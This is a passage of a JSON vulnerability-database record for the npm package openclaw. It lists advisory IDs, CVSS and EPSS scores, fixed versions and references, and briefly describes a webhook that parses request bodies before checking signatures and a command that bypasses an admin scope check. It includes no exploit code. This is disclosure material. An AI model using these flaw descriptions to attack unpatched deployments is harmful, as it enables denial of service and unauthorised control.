ID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.13"}],"aliases":["CVE-2026-32980","GHSA-jq3f-vjww-8rq7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tdjc-vav8-97cf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89742?format=json","vulnerability_id":"VCID-te8f-snty-j7hh","summary":"Duplicate Advisory: OpenClaw: Feishu webhook reads and parses unauthenticated request bodies before signature validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-3h52-cx59-c456. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 parses JSON request bodies before validating webhook signatures, allowing unauthenticated attackers to force resource-intensive parsing operations. Remote attackers can send malicious webhook requests to trigger denial of service by exhausting server resources through forced JSON parsing before signature rejection.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35640","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35640"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing"},{"reference_url":"https://github.com/advisories/GHSA-8f9r-gr6r-x63q","reference_id":"GHSA-8f9r-gr6r-x63q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8f9r-gr6r-x63q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-8f9r-gr6r-x63q"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-te8f-snty-j7hh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89104?format=json","vulnerability_id":"VCID-tf28-1z2z-5yfn","summary":"OpenClaw: `/phone arm`/`/phone disarm` Bypasses `operator.admin` Scope Check for External Channels\n## Summary\n`/phone arm`/`/phone disarm` Bypasses `operator.admin` Scope Check for External Channels\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Maintainers accepted this issue, fixed it in aa66ae1fc797d3298cc409ed2c5da69a89950a45 on 2026-03-27, and that fix shipped in v2026.3.28, so normalize it as a fixed released draft rather than a close-by-trust-model call.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `aa66ae1fc797d3298cc409ed2c5da69a89950a45` — 2026-03-27T20:35:42Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41375","reference_id":"","reference_type":"","scores":[{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25193","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.2513","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25179","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41375"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h2v7-xc88-xx8c","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h2v7-xc88-xx8c"},{"reference_url":"https://github.com/openclaw/openclaw/commit/aa66ae1fc797d3298cc409ed2c5da69a89950a45","reference_id":"aa66ae1fc797d3298cc409ed2c5da69a89950a45","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/"}],"url":"https://github.com/openclaw/openclaw/commit/aa66ae1fc797d3298cc409ed2c5da69a89950a45"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41375","reference_id":"CVE-2026-41375","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41375"},{"reference_url":"https://github.com/advisories/GHSA-h2v7-xc88-xx8c","reference_id":"GHSA-h2v7-xc88-xx8c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h2v7-xc88-xx8c"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints","reference_id":"openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"